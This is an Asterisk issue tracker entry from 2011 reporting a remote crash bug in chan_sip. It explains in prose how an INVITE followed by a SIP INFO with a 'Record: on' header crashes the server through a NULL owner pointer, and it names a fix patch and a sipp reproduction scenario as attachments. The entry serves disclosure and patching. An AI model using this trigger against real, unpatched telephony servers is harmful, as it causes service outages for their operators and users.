Summary:ASTERISK-18805: Remote crash vulnerability in chan_sip when automon in features.conf is enabled
Reporter:Kristijan Vrban (vrban)Labels:
Date Opened:2011-11-02 04:55:44Date Closed:2011-12-08 10:20:17.000-0600
Versions: Frequency of
must be completed before resolvingASTERISK-18499 Asterisk Release Blockers
must be completed before resolvingASTERISK-18847 Asterisk 10.0.0 Release Blockers
Environment:Attachments:( 0) info_crash_fix.patch
( 1) info_crash.xml
Description:Asterisk 1.6/1.8/10 and trunk are affected. To crash Asterisk, you just need to send a aimless SIP INVITE (which get a 407 answer)
just to open a SIP dialog. And then send a SIP INFO with a "Record: on" header in this dialog. Then asterisk crash in channel.c/ast_queue_frame,
because  ast_queue_frame(p->owner, &f) is call with p->owner == NULL from handle_request_info, because no channel is active.

The patch just checks, if p->owner is set. Otherwise it send a 481 (perhaps something else?)
Comments:By: Kristijan Vrban (vrban) 2011-11-03 09:56:50.623-0500

Here is a sipp scenario to reproduce the crash.